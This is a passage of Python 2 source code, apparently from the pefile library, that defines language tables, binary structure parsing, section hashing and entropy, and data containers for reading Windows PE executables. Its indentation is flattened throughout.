('LANG_MALAY', 0x3e),
('LANG_MALAYALAM', 0x4c),
('LANG_MANIPURI', 0x58),
('LANG_MARATHI', 0x4e),
('LANG_MONGOLIAN', 0x50),
('LANG_NEPALI', 0x61),
('LANG_NORWEGIAN', 0x14),
('LANG_ORIYA', 0x48),
('LANG_POLISH', 0x15),
('LANG_PORTUGUESE', 0x16),
('LANG_PUNJABI', 0x46),
('LANG_ROMANIAN', 0x18),
('LANG_RUSSIAN', 0x19),
('LANG_SANSKRIT', 0x4f),
('LANG_SERBIAN', 0x1a),
('LANG_SINDHI', 0x59),
('LANG_SLOVAK', 0x1b),
('LANG_SLOVENIAN', 0x24),
('LANG_SPANISH', 0x0a),
('LANG_SWAHILI', 0x41),
('LANG_SWEDISH', 0x1d),
('LANG_SYRIAC', 0x5a),
('LANG_TAMIL', 0x49),
('LANG_TATAR', 0x44),
('LANG_TELUGU', 0x4a),
('LANG_THAI', 0x1e),
('LANG_TURKISH', 0x1f),
('LANG_UKRAINIAN', 0x22),
('LANG_URDU', 0x20),
('LANG_UZBEK', 0x43),
('LANG_VIETNAMESE', 0x2a),
('LANG_GAELIC', 0x3c),
('LANG_MALTESE', 0x3a),
('LANG_MAORI', 0x28),
('LANG_RHAETO_ROMANCE',0x17),
('LANG_SAAMI', 0x3b),
('LANG_SORBIAN', 0x2e),
('LANG_SUTU', 0x30),
('LANG_TSONGA', 0x31),
('LANG_TSWANA', 0x32),
('LANG_VENDA', 0x33),
('LANG_XHOSA', 0x34),
('LANG_ZULU', 0x35),
('LANG_ESPERANTO', 0x8f),
('LANG_WALON', 0x90),
('LANG_CORNISH', 0x91),
('LANG_WELSH', 0x92),
('LANG_BRETON', 0x93) ]
LANG = dict(lang+[(e[1], e[0]) for e in lang])
# Sublanguage definitions
sublang = [
('SUBLANG_NEUTRAL', 0x00),
('SUBLANG_DEFAULT', 0x01),
('SUBLANG_SYS_DEFAULT', 0x02),
('SUBLANG_ARABIC_SAUDI_ARABIA', 0x01),
('SUBLANG_ARABIC_IRAQ', 0x02),
('SUBLANG_ARABIC_EGYPT', 0x03),
('SUBLANG_ARABIC_LIBYA', 0x04),
('SUBLANG_ARABIC_ALGERIA', 0x05),
('SUBLANG_ARABIC_MOROCCO', 0x06),
('SUBLANG_ARABIC_TUNISIA', 0x07),
('SUBLANG_ARABIC_OMAN', 0x08),
('SUBLANG_ARABIC_YEMEN', 0x09),
('SUBLANG_ARABIC_SYRIA', 0x0a),
('SUBLANG_ARABIC_JORDAN', 0x0b),
('SUBLANG_ARABIC_LEBANON', 0x0c),
('SUBLANG_ARABIC_KUWAIT', 0x0d),
('SUBLANG_ARABIC_UAE', 0x0e),
('SUBLANG_ARABIC_BAHRAIN', 0x0f),
('SUBLANG_ARABIC_QATAR', 0x10),
('SUBLANG_AZERI_LATIN', 0x01),
('SUBLANG_AZERI_CYRILLIC', 0x02),
('SUBLANG_CHINESE_TRADITIONAL', 0x01),
('SUBLANG_CHINESE_SIMPLIFIED', 0x02),
('SUBLANG_CHINESE_HONGKONG', 0x03),
('SUBLANG_CHINESE_SINGAPORE', 0x04),
('SUBLANG_CHINESE_MACAU', 0x05),
('SUBLANG_DUTCH', 0x01),
('SUBLANG_DUTCH_BELGIAN', 0x02),
('SUBLANG_ENGLISH_US', 0x01),
('SUBLANG_ENGLISH_UK', 0x02),
('SUBLANG_ENGLISH_AUS', 0x03),
('SUBLANG_ENGLISH_CAN', 0x04),
('SUBLANG_ENGLISH_NZ', 0x05),
('SUBLANG_ENGLISH_EIRE', 0x06),
('SUBLANG_ENGLISH_SOUTH_AFRICA', 0x07),
('SUBLANG_ENGLISH_JAMAICA', 0x08),
('SUBLANG_ENGLISH_CARIBBEAN', 0x09),
('SUBLANG_ENGLISH_BELIZE', 0x0a),
('SUBLANG_ENGLISH_TRINIDAD', 0x0b),
('SUBLANG_ENGLISH_ZIMBABWE', 0x0c),
('SUBLANG_ENGLISH_PHILIPPINES', 0x0d),
('SUBLANG_FRENCH', 0x01),
('SUBLANG_FRENCH_BELGIAN', 0x02),
('SUBLANG_FRENCH_CANADIAN', 0x03),
('SUBLANG_FRENCH_SWISS', 0x04),
('SUBLANG_FRENCH_LUXEMBOURG', 0x05),
('SUBLANG_FRENCH_MONACO', 0x06),
('SUBLANG_GERMAN', 0x01),
('SUBLANG_GERMAN_SWISS', 0x02),
('SUBLANG_GERMAN_AUSTRIAN', 0x03),
('SUBLANG_GERMAN_LUXEMBOURG', 0x04),
('SUBLANG_GERMAN_LIECHTENSTEIN', 0x05),
('SUBLANG_ITALIAN', 0x01),
('SUBLANG_ITALIAN_SWISS', 0x02),
('SUBLANG_KASHMIRI_SASIA', 0x02),
('SUBLANG_KASHMIRI_INDIA', 0x02),
('SUBLANG_KOREAN', 0x01),
('SUBLANG_LITHUANIAN', 0x01),
('SUBLANG_MALAY_MALAYSIA', 0x01),
('SUBLANG_MALAY_BRUNEI_DARUSSALAM', 0x02),
('SUBLANG_NEPALI_INDIA', 0x02),
('SUBLANG_NORWEGIAN_BOKMAL', 0x01),
('SUBLANG_NORWEGIAN_NYNORSK', 0x02),
('SUBLANG_PORTUGUESE', 0x02),
('SUBLANG_PORTUGUESE_BRAZILIAN', 0x01),
('SUBLANG_SERBIAN_LATIN', 0x02),
('SUBLANG_SERBIAN_CYRILLIC', 0x03),
('SUBLANG_SPANISH', 0x01),
('SUBLANG_SPANISH_MEXICAN', 0x02),
('SUBLANG_SPANISH_MODERN', 0x03),
('SUBLANG_SPANISH_GUATEMALA', 0x04),
('SUBLANG_SPANISH_COSTA_RICA', 0x05),
('SUBLANG_SPANISH_PANAMA', 0x06),
('SUBLANG_SPANISH_DOMINICAN_REPUBLIC', 0x07),
('SUBLANG_SPANISH_VENEZUELA', 0x08),
('SUBLANG_SPANISH_COLOMBIA', 0x09),
('SUBLANG_SPANISH_PERU', 0x0a),
('SUBLANG_SPANISH_ARGENTINA', 0x0b),
('SUBLANG_SPANISH_ECUADOR', 0x0c),
('SUBLANG_SPANISH_CHILE', 0x0d),
('SUBLANG_SPANISH_URUGUAY', 0x0e),
('SUBLANG_SPANISH_PARAGUAY', 0x0f),
('SUBLANG_SPANISH_BOLIVIA', 0x10),
('SUBLANG_SPANISH_EL_SALVADOR', 0x11),
('SUBLANG_SPANISH_HONDURAS', 0x12),
('SUBLANG_SPANISH_NICARAGUA', 0x13),
('SUBLANG_SPANISH_PUERTO_RICO', 0x14),
('SUBLANG_SWEDISH', 0x01),
('SUBLANG_SWEDISH_FINLAND', 0x02),
('SUBLANG_URDU_PAKISTAN', 0x01),
('SUBLANG_URDU_INDIA', 0x02),
('SUBLANG_UZBEK_LATIN', 0x01),
('SUBLANG_UZBEK_CYRILLIC', 0x02),
('SUBLANG_DUTCH_SURINAM', 0x03),
('SUBLANG_ROMANIAN', 0x01),
('SUBLANG_ROMANIAN_MOLDAVIA', 0x02),
('SUBLANG_RUSSIAN', 0x01),
('SUBLANG_RUSSIAN_MOLDAVIA', 0x02),
('SUBLANG_CROATIAN', 0x01),
('SUBLANG_LITHUANIAN_CLASSIC', 0x02),
('SUBLANG_GAELIC', 0x01),
('SUBLANG_GAELIC_SCOTTISH', 0x02),
('SUBLANG_GAELIC_MANX', 0x03) ]
SUBLANG = dict(sublang+[(e[1], e[0]) for e in sublang])
# Initialize the dictionary with all the name->value pairs
SUBLANG = dict( sublang )
# Now add all the value->name information, handling duplicates appropriately
for sublang_name, sublang_value in sublang:
if SUBLANG.has_key( sublang_value ):
SUBLANG[ sublang_value ].append( sublang_name )
else:
SUBLANG[ sublang_value ] = [ sublang_name ]
# Resolve a sublang name given the main lang name
#
def get_sublang_name_for_lang( lang_value, sublang_value ):
lang_name = LANG.get(lang_value, '*unknown*')
for sublang_name in SUBLANG.get(sublang_value, list()):
# if the main language is a substring of sublang's name, then
# return that
if lang_name in sublang_name:
return sublang_name
# otherwise return the first sublang name
return SUBLANG.get(sublang_value, ['*unknown*'])[0]
# Ange Albertini's code to process resources' strings
#
def parse_strings(data, counter, l):
i = 0
error_count = 0
while i < len(data):
data_slice = data[i:i + 2]
if len(data_slice) < 2:
break
len_ = struct.unpack("<h", data_slice)[0]
i += 2
if len_ != 0 and 0 <= len_*2 <= len(data):
try:
l[counter] = data[i: i + len_ * 2].decode('utf-16')
except UnicodeDecodeError:
error_count += 1
pass
if error_count >= 3:
break
i += len_ * 2
counter += 1
def retrieve_flags(flag_dict, flag_filter):
"""Read the flags from a dictionary and return them in a usable form.
Will return a list of (flag, value) for all flags in "flag_dict"
matching the filter "flag_filter".
"""
return [(f[0], f[1]) for f in flag_dict.items() if
isinstance(f[0], str) and f[0].startswith(flag_filter)]
def set_flags(obj, flag_field, flags):
"""Will process the flags and set attributes in the object accordingly.
The object "obj" will gain attributes named after the flags provided in
"flags" and valued True/False, matching the results of applying each
flag value from "flags" to flag_field.
"""
for flag in flags:
if flag[1] & flag_field:
#setattr(obj, flag[0], True)
obj.__dict__[flag[0]] = True
else:
#setattr(obj, flag[0], False)
obj.__dict__[flag[0]] = False
def power_of_two(val):
return val != 0 and (val & (val-1)) == 0
FILE_ALIGNEMNT_HARDCODED_VALUE = 0x200
FileAlignment_Warning = False # We only want to print the warning once
SectionAlignment_Warning = False # We only want to print the warning once
class UnicodeStringWrapperPostProcessor:
"""This class attempts to help the process of identifying strings
that might be plain Unicode or Pascal. A list of strings will be
wrapped on it with the hope the overlappings will help make the
decision about their type."""
def __init__(self, pe, rva_ptr):
self.pe = pe
self.rva_ptr = rva_ptr
self.string = None
def get_rva(self):
"""Get the RVA of the string."""
return self.rva_ptr
def __str__(self):
"""Return the escaped ASCII representation of the string."""
def convert_char(char):
if char in string.printable:
return char
else:
return r'\x%02x' % ord(char)
if self.string:
return ''.join([convert_char(c) for c in self.string])
return ''
def invalidate(self):
"""Make this instance None, to express it's no known string type."""
self = None
def render_pascal_16(self):
self.string = self.pe.get_string_u_at_rva(
self.rva_ptr+2,
max_length=self.get_pascal_16_length())
def ask_pascal_16(self, next_rva_ptr):
"""The next RVA is taken to be the one immediately following this one.
Such RVA could indicate the natural end of the string and will be checked
with the possible length contained in the first word.
"""
length = self.get_pascal_16_length()
if length == (next_rva_ptr - (self.rva_ptr+2)) / 2:
self.length = length
return True
return False
def get_pascal_16_length(self):
return self.__get_word_value_at_rva(self.rva_ptr)
def __get_word_value_at_rva(self, rva):
try:
data = self.pe.get_data(self.rva_ptr, 2)
except PEFormatError, e:
return False
if len(data)<2:
return False
return struct.unpack('<H', data)[0]
def ask_unicode_16(self, next_rva_ptr):
"""The next RVA is taken to be the one immediately following this one.
Such RVA could indicate the natural end of the string and will be checked
to see if there's a Unicode NULL character there.
"""
if self.__get_word_value_at_rva(next_rva_ptr-2) == 0:
self.length = next_rva_ptr - self.rva_ptr
return True
return False
def render_unicode_16(self):
""""""
self.string = self.pe.get_string_u_at_rva(self.rva_ptr)
class PEFormatError(Exception):
"""Generic PE format error exception."""
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Dump:
"""Convenience class for dumping the PE information."""
def __init__(self):
self.text = list()
def add_lines(self, txt, indent=0):
"""Adds a list of lines.
The list can be indented with the optional argument 'indent'.
"""
for line in txt:
self.add_line(line, indent)
def add_line(self, txt, indent=0):
"""Adds a line.
The line can be indented with the optional argument 'indent'.
"""
self.add(txt+'\n', indent)
def add(self, txt, indent=0):
"""Adds some text, no newline will be appended.
The text can be indented with the optional argument 'indent'.
"""
if isinstance(txt, unicode):
try:
txt = str(txt)
except UnicodeEncodeError:
s = []
for c in txt:
try:
s.append(str(c))
except UnicodeEncodeError:
s.append(repr(c))
txt = ''.join(s)
self.text.append( ' '*indent + txt )
def add_header(self, txt):
"""Adds a header element."""
self.add_line('-'*10+txt+'-'*10+'\n')
def add_newline(self):
"""Adds a newline."""
self.text.append( '\n' )
def get_text(self):
"""Get the text in its current state."""
return ''.join( self.text )
STRUCT_SIZEOF_TYPES = {
'x': 1, 'c': 1, 'b': 1, 'B': 1,
'h': 2, 'H': 2,
'i': 4, 'I': 4, 'l': 4, 'L': 4, 'f': 4,
'q': 8, 'Q': 8, 'd': 8,
's': 1 }
class Structure:
"""Prepare structure object to extract members from data.
Format is a list containing definitions for the elements
of the structure.
"""
def __init__(self, format, name=None, file_offset=None):
# Format is forced little endian, for big endian non Intel platforms
self.__format__ = '<'
self.__keys__ = []
#self.values = {}
self.__format_length__ = 0
self.__field_offsets__ = dict()
self.__set_format__(format[1])
self.__all_zeroes__ = False
self.__unpacked_data_elms__ = None
self.__file_offset__ = file_offset
if name:
self.name = name
else:
self.name = format[0]
def __get_format__(self):
return self.__format__
def get_field_absolute_offset(self, field_name):
"""Return the offset within the field for the requested field in the structure."""
return self.__file_offset__ + self.__field_offsets__[field_name]
def get_field_relative_offset(self, field_name):
"""Return the offset within the structure for the requested field."""
return self.__field_offsets__[field_name]
def get_file_offset(self):
return self.__file_offset__
def set_file_offset(self, offset):
self.__file_offset__ = offset
def all_zeroes(self):
"""Returns true is the unpacked data is all zeros."""
return self.__all_zeroes__
def sizeof_type(self, t):
count = 1
_t = t
if t[0] in string.digits:
# extract the count
count = int( ''.join([d for d in t if d in string.digits]) )
_t = ''.join([d for d in t if d not in string.digits])
return STRUCT_SIZEOF_TYPES[_t] * count
def __set_format__(self, format):
offset = 0
for elm in format:
if ',' in elm:
elm_type, elm_name = elm.split(',', 1)
self.__format__ += elm_type
elm_names = elm_name.split(',')
names = []
for elm_name in elm_names:
if elm_name in self.__keys__:
search_list = [x[:len(elm_name)] for x in self.__keys__]
occ_count = search_list.count(elm_name)
elm_name = elm_name+'_'+str(occ_count)
names.append(elm_name)
self.__field_offsets__[elm_name] = offset
offset += self.sizeof_type(elm_type)
# Some PE header structures have unions on them, so a certain
# value might have different names, so each key has a list of
# all the possible members referring to the data.
self.__keys__.append(names)
self.__format_length__ = struct.calcsize(self.__format__)
def sizeof(self):
"""Return size of the structure."""
return self.__format_length__
def __unpack__(self, data):
if len(data) > self.__format_length__:
data = data[:self.__format_length__]
# OC Patch:
# Some malware have incorrect header lengths.
# Fail gracefully if this occurs
# Buggy malware: a29b0118af8b7408444df81701adf
#
elif len(data) < self.__format_length__:
raise PEFormatError('Data length less than expected header length.')
if data.count(chr(0)) == len(data):
self.__all_zeroes__ = True
self.__unpacked_data_elms__ = struct.unpack(self.__format__, data)
for i in xrange(len(self.__unpacked_data_elms__)):
for key in self.__keys__[i]:
setattr(self, key, self.__unpacked_data_elms__[i])
def __pack__(self):
new_values = []
for i in xrange(len(self.__unpacked_data_elms__)):
for key in self.__keys__[i]:
new_val = getattr(self, key)
old_val = self.__unpacked_data_elms__[i]
# In the case of Unions, when the first changed value
# is picked the loop is exited
if new_val != old_val:
break
new_values.append(new_val)
return struct.pack(self.__format__, *new_values)
def __str__(self):
return '\n'.join( self.dump() )
def __repr__(self):
return '<Structure: %s>' % (' '.join( [' '.join(s.split()) for s in self.dump()] ))
def dump(self, indentation=0):
"""Returns a string representation of the structure."""
dump = []
dump.append('[%s]' % self.name)
# Refer to the __set_format__ method for an explanation
# of the following construct.
for keys in self.__keys__:
for key in keys:
val = getattr(self, key)
if isinstance(val, int) or isinstance(val, long):
val_str = '0x%-8X' % (val)
if key == 'TimeDateStamp' or key == 'dwTimeStamp':
try:
val_str += ' [%s UTC]' % time.asctime(time.gmtime(val))
except exceptions.ValueError, e:
val_str += ' [INVALID TIME]'
else:
val_str = ''.join(filter(lambda c:c != '\0', str(val)))
dump.append('0x%-8X 0x%-3X %-30s %s' % (
self.__field_offsets__[key] + self.__file_offset__,
self.__field_offsets__[key], key+':', val_str))
return dump
def dump_dict(self):
"""Returns a dictionary representation of the structure."""
dump_dict = dict()
dump_dict['Structure'] = self.name
# Refer to the __set_format__ method for an explanation
# of the following construct.
for keys in self.__keys__:
for key in keys:
val = getattr(self, key)
if isinstance(val, int) or isinstance(val, long):
if key == 'TimeDateStamp' or key == 'dwTimeStamp':
try:
val = '0x%-8X [%s UTC]' % (val, time.asctime(time.gmtime(val)))
except exceptions.ValueError, e:
val = '0x%-8X [INVALID TIME]' % val
else:
val = ''.join(filter(lambda c:c != '\0', str(val)))
dump_dict[key] = {'FileOffset': self.__field_offsets__[key] + self.__file_offset__,
'Offset': self.__field_offsets__[key],
'Value': val}
return dump_dict
class SectionStructure(Structure):
"""Convenience section handling class."""
def __init__(self, *argl, **argd):
if 'pe' in argd:
self.pe = argd['pe']
del argd['pe']
Structure.__init__(self, *argl, **argd)
def get_data(self, start=None, length=None):
"""Get data chunk from a section.
Allows to query data from the section by passing the
addresses where the PE file would be loaded by default.
It is then possible to retrieve code and data by its real
addresses as it would be if loaded.
"""
PointerToRawData_adj = self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment )
VirtualAddress_adj = self.pe.adjust_SectionAlignment( self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment, self.pe.OPTIONAL_HEADER.FileAlignment )
if start is None:
offset = PointerToRawData_adj
else:
offset = ( start - VirtualAddress_adj ) + PointerToRawData_adj
if length is not None:
end = offset + length
else:
end = offset + self.SizeOfRawData
# PointerToRawData is not adjusted here as we might want to read any possible extra bytes
# that might get cut off by aligning the start (and hence cutting something off the end)
#
if end > self.PointerToRawData + self.SizeOfRawData:
end = self.PointerToRawData + self.SizeOfRawData
# print "offset : ",offset ,"end : ", end
return self.pe.__data__[offset:end]
def __setattr__(self, name, val):
if name == 'Characteristics':
section_flags = retrieve_flags(SECTION_CHARACTERISTICS, 'IMAGE_SCN_')
# Set the section's flags according the the Characteristics member
set_flags(self, val, section_flags)
elif 'IMAGE_SCN_' in name and hasattr(self, name):
if val:
self.__dict__['Characteristics'] |= SECTION_CHARACTERISTICS[name]
else:
self.__dict__['Characteristics'] ^= SECTION_CHARACTERISTICS[name]
self.__dict__[name] = val
def get_rva_from_offset(self, offset):
return (offset -
self.pe.adjust_FileAlignment(
self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment
) + self.pe.adjust_SectionAlignment(
self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment,
self.pe.OPTIONAL_HEADER.FileAlignment )
)
def get_offset_from_rva(self, rva):
return (rva -
self.pe.adjust_SectionAlignment(
self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment,
self.pe.OPTIONAL_HEADER.FileAlignment )
) + self.pe.adjust_FileAlignment(
self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment )
def contains_offset(self, offset):
"""Check whether the section contains the file offset provided."""
if self.PointerToRawData is None:
# bss and other sections containing only uninitialized data must have 0
# and do not take space in the file
return False
return ( self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) <=
offset <
self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) +
self.SizeOfRawData )
def contains_rva(self, rva):
"""Check whether the section contains the address provided."""
# Check if the SizeOfRawData is realistic. If it's bigger than the size of
# the whole PE file minus the start address of the section it could be
# either truncated or the SizeOfRawData contain a misleading value.
# In either of those cases we take the VirtualSize
#
if len(self.pe.__data__) - self.pe.adjust_FileAlignment( self.PointerToRawData,
self.pe.OPTIONAL_HEADER.FileAlignment ) < self.SizeOfRawData:
# PECOFF documentation v8 says:
# VirtualSize: The total size of the section when loaded into memory.
# If this value is greater than SizeOfRawData, the section is zero-padded.
# This field is valid only for executable images and should be set to zero
# for object files.
#
size = self.Misc_VirtualSize
else:
size = max(self.SizeOfRawData, self.Misc_VirtualSize)
VirtualAddress_adj = self.pe.adjust_SectionAlignment( self.VirtualAddress,
self.pe.OPTIONAL_HEADER.SectionAlignment, self.pe.OPTIONAL_HEADER.FileAlignment )
# Check whether there's any section after the current one that starts before the
# calculated end for the current one, if so, cut the current section's size
# to fit in the range up to where the next section starts.
if (self.next_section_virtual_address is not None and
self.next_section_virtual_address > self.VirtualAddress and
VirtualAddress_adj + size > self.next_section_virtual_address):
size = self.next_section_virtual_address - VirtualAddress_adj
return VirtualAddress_adj <= rva < VirtualAddress_adj + size
def contains(self, rva):
#print "DEPRECATION WARNING: you should use contains_rva() instead of contains()"
return self.contains_rva(rva)
def get_entropy(self):
"""Calculate and return the entropy for the section."""
return self.entropy_H( self.get_data() )
def get_hash_sha1(self):
"""Get the SHA-1 hex-digest of the section's data."""
if sha1 is not None:
return sha1( self.get_data() ).hexdigest()
def get_hash_sha256(self):
"""Get the SHA-256 hex-digest of the section's data."""
if sha256 is not None:
return sha256( self.get_data() ).hexdigest()
def get_hash_sha512(self):
"""Get the SHA-512 hex-digest of the section's data."""
if sha512 is not None:
return sha512( self.get_data() ).hexdigest()
def get_hash_md5(self):
"""Get the MD5 hex-digest of the section's data."""
if md5 is not None:
return md5( self.get_data() ).hexdigest()
def entropy_H(self, data):
"""Calculate the entropy of a chunk of data."""
if len(data) == 0:
return 0.0
occurences = array.array('L', [0]*256)
for x in data:
occurences[ord(x)] += 1
entropy = 0
for x in occurences:
if x:
p_x = float(x) / len(data)
entropy -= p_x*math.log(p_x, 2)
# print "p_x", p_x
return entropy
class DataContainer(object):
"""Generic data container."""
def __init__(self, **args):
bare_setattr = super(DataContainer, self).__setattr__
for key, value in args.items():
bare_setattr(key, value)
class ImportDescData(DataContainer):
"""Holds import descriptor information.
dll: name of the imported DLL
imports: list of imported symbols (ImportData instances)
struct: IMAGE_IMPORT_DESCRIPTOR structure
"""
class ImportData(DataContainer):
"""Holds imported symbol's information.
ordinal: Ordinal of the symbol
name: Name of the symbol
bound: If the symbol is bound, this contains
the address.
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have an ordinal attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'ordinal') and hasattr(self, 'bound') and hasattr(self, 'name'):
if name == 'ordinal':
if self.pe.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE:
ordinal_flag = IMAGE_ORDINAL_FLAG
elif self.pe.PE_TYPE == OPTIONAL_HEADER_MAGIC_PE_PLUS:
ordinal_flag = IMAGE_ORDINAL_FLAG64
# Set the ordinal and flag the entry as importing by ordinal
self.struct_table.Ordinal = ordinal_flag | (val & 0xffff)
self.struct_table.AddressOfData = self.struct_table.Ordinal
self.struct_table.Function = self.struct_table.Ordinal
self.struct_table.ForwarderString = self.struct_table.Ordinal
elif name == 'bound':
if self.struct_iat is not None:
self.struct_iat.AddressOfData = val
self.struct_iat.AddressOfData = self.struct_iat.AddressOfData
self.struct_iat.Function = self.struct_iat.AddressOfData
self.struct_iat.ForwarderString = self.struct_iat.AddressOfData
elif name == 'address':
self.struct_table.AddressOfData = val
self.struct_table.Ordinal = self.struct_table.AddressOfData
self.struct_table.Function = self.struct_table.AddressOfData
self.struct_table.ForwarderString = self.struct_table.AddressOfData
elif name == 'name':
# Make sure we reset the entry in case the import had been set to import by ordinal
if self.name_offset:
name_rva = self.pe.get_rva_from_offset( self.name_offset )
self.pe.set_dword_at_offset( self.ordinal_offset, (0<<31) | name_rva )
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.name):
#raise Exception('The export name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.name_offset, val )
self.__dict__[name] = val
class ExportDirData(DataContainer):
"""Holds export directory information.
struct: IMAGE_EXPORT_DIRECTORY structure
symbols: list of exported symbols (ExportData instances)
"""
class ExportData(DataContainer):
"""Holds exported symbols' information.
ordinal: ordinal of the symbol
address: address of the symbol
name: name of the symbol (None if the symbol is
exported by ordinal only)
forwarder: if the symbol is forwarded it will
contain the name of the target symbol,
None otherwise.
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have an ordinal attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'ordinal') and hasattr(self, 'address') and hasattr(self, 'forwarder') and hasattr(self, 'name'):
if name == 'ordinal':
self.pe.set_word_at_offset( self.ordinal_offset, val )
elif name == 'address':
self.pe.set_dword_at_offset( self.address_offset, val )
elif name == 'name':
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.name):
#raise Exception('The export name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.name_offset, val )
elif name == 'forwarder':
# Complain if the length of the new name is longer than the existing one
if len(val) > len(self.forwarder):
#raise Exception('The forwarder name provided is longer than the existing one.')
pass
self.pe.set_bytes_at_offset( self.forwarder_offset, val )
self.__dict__[name] = val
class ResourceDirData(DataContainer):
"""Holds resource directory information.
struct: IMAGE_RESOURCE_DIRECTORY structure
entries: list of entries (ResourceDirEntryData instances)
"""
class ResourceDirEntryData(DataContainer):
"""Holds resource directory entry data.
struct: IMAGE_RESOURCE_DIRECTORY_ENTRY structure
name: If the resource is identified by name this
attribute will contain the name string. None
otherwise. If identified by id, the id is
available at 'struct.Id'
id: the id, also in struct.Id
directory: If this entry has a lower level directory
this attribute will point to the
ResourceDirData instance representing it.
data: If this entry has no further lower directories
and points to the actual resource data, this
attribute will reference the corresponding
ResourceDataEntryData instance.
(Either of the 'directory' or 'data' attribute will exist,
but not both.)
"""
class ResourceDataEntryData(DataContainer):
"""Holds resource data entry information.
struct: IMAGE_RESOURCE_DATA_ENTRY structure
lang: Primary language ID
sublang: Sublanguage ID
"""
class DebugData(DataContainer):
"""Holds debug information.
struct: IMAGE_DEBUG_DIRECTORY structure
"""
class BaseRelocationData(DataContainer):
"""Holds base relocation information.
struct: IMAGE_BASE_RELOCATION structure
entries: list of relocation data (RelocationData instances)
"""
class RelocationData(DataContainer):
"""Holds relocation information.
type: Type of relocation
The type string is can be obtained by
RELOCATION_TYPE[type]
rva: RVA of the relocation
"""
def __setattr__(self, name, val):
# If the instance doesn't yet have a struct attribute
# it's not fully initialized so can't do any of the
# following
#
if hasattr(self, 'struct'):
# Get the word containing the type and data
#
word = self.struct.Data
if name == 'type':
word = (val << 12) | (word & 0xfff)
elif name == 'rva':
offset = val-self.base_rva
if offset < 0:
offset = 0
word = ( word & 0xf000) | ( offset & 0xfff)
# Store the modified data
#
self.struct.Data = word
self.__dict__[name] = val
class TlsData(DataContainer):
"""Holds TLS information.
struct: IMAGE_TLS_DIRECTORY structure
"""
class BoundImportDescData(DataContainer):
"""Holds bound import descriptor data.
This directory entry will provide with information on the
DLLs this PE files has been bound to (if bound at all).
The structure will contain the name and timestamp of the
DLL at the time of binding so that the loader can know
whether it differs from the one currently present in the
system and must, therefore, re-bind the PE's imports.
struct: IMAGE_BOUND_IMPORT_DESCRIPTOR structure
name: DLL name
entries: list of entries (BoundImportRefData instances)
the entries will exist if this DLL has forwarded
symbols. If so, the destination DLL will have an
entry in this list.
"""
class LoadConfigData(DataContainer):
"""Holds Load Config data.
struct: IMAGE_LOAD_CONFIG_DIRECTORY structure
name: dll name
"""
class BoundImportRefData(DataContainer):
"""Holds bound import forwarder reference data.
Contains the same information as the bound descriptor but
for forwarded DLLs, if any.
struct: IMAGE_BOUND_FORWARDER_REF structure
name: dll name
"""
# Valid FAT32 8.3 short filename characters according to:
# http://en.wikipedia.org/wiki/8.3_filename
# This will help decide whether DLL ASCII names are likely
# to be valid or otherwise corrupt data
#
# The filename length is not checked because the DLLs filename
# can be longer that the 8.3
allowed_filename = string.lowercase + string.uppercase + string.digits + "!#$%&'()-@^_`{}~+,.;=[]" + ''.join( [chr(i) for i in range(128, 256)] )
def is_valid_dos_filename(s):
if s is None or not isinstance(s, str):
return False
for c in s:
# Allow path separators as import names can contain directories.
if c not in allowed_filename and c not in '\\/':
return False
return True
# Check if a imported name uses the valid accepted characters expected in mangled
# function names. If the symbol's characters don't fall within this charset
# we will assume the name is invalid
#
allowed_function_name = string.lowercase + string.uppercase + string.digits + '_?@$()'
def is_valid_function_name(s):
if s is None or not isinstance(s, str):
return False
for c in s:
if c not in allowed_function_name:
return False
return True
class PE:
"""A Portable Executable representation.
This class provides access to most of the information in a PE file.
It expects to be supplied the name of the file to load or PE data
to process and an optional argument 'fast_load' (False by default)
which controls whether to load all the directories information,
which can be quite time consuming.
pe = pefile.PE('module.dll')
pe = pefile.PE(name='module.dll')
would load 'module.dll' and process it. If the data would be already
available in a buffer the same could be achieved with:
pe = pefile.PE(data=module_dll_data)
The "fast_load" can be set to a default by setting its value in the
module itself by means, for instance, of a "pefile.fast_load = True".
That will make all the subsequent instances not to load the
whole PE structure. The "full_load" method can be used to parse
the missing data at a later stage.
Basic headers information will be available in the attributes:
DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER
All of them will contain among their attributes the members of the
corresponding structures as defined in WINNT.H
The raw data corresponding to the header (from the beginning of the
file up to the start of the first section) will be available in the
instance's attribute 'header' as a string.
The sections will be available as a list in the 'sections' attribute.
Each entry will contain as attributes all the structure's members.
Directory entries will be available as attributes (if they exist):
(no other entries are processed at this point)
DIRECTORY_ENTRY_IMPORT (list of ImportDescData instances)
DIRECTORY_ENTRY_EXPORT (ExportDirData instance)
DIRECTORY_ENTRY_RESOURCE (ResourceDirData instance)
DIRECTORY_ENTRY_DEBUG (list of DebugData instances)
DIRECTORY_ENTRY_BASERELOC (list of BaseRelocationData instances)
DIRECTORY_ENTRY_TLS
DIRECTORY_ENTRY_BOUND_IMPORT (list of BoundImportData instances)
The following dictionary attributes provide ways of mapping different
constants. They will accept the numeric value and return the string
representation and the opposite, feed in the string and get the
numeric constant:
DIRECTORY_ENTRY
IMAGE_CHARACTERISTICS
SECTION_CHARACTERISTICS
DEBUG_TYPE
SUBSYSTEM_TYPE
MACHINE_TYPE
RELOCATION_TYPE
RESOURCE_TYPE
LANG
SUBLANG
"""
#
# Format specifications for PE structures.
#
__IMAGE_DOS_HEADER_format__ = ('IMAGE_DOS_HEADER',
('H,e_magic', 'H,e_cblp', 'H,e_cp',
